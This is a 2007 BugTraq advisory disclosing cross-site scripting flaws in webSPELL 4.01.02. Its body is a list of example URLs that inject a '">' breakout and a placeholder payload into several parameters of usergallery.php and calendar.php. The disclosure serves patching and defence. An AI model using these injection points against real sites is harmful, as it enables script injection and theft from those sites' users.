BugTraq
webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
Dec 08 2007 10:53PM
brainheadbrainhead gmx de
###################
Author: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes: off
###################
Examples:
http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[your code]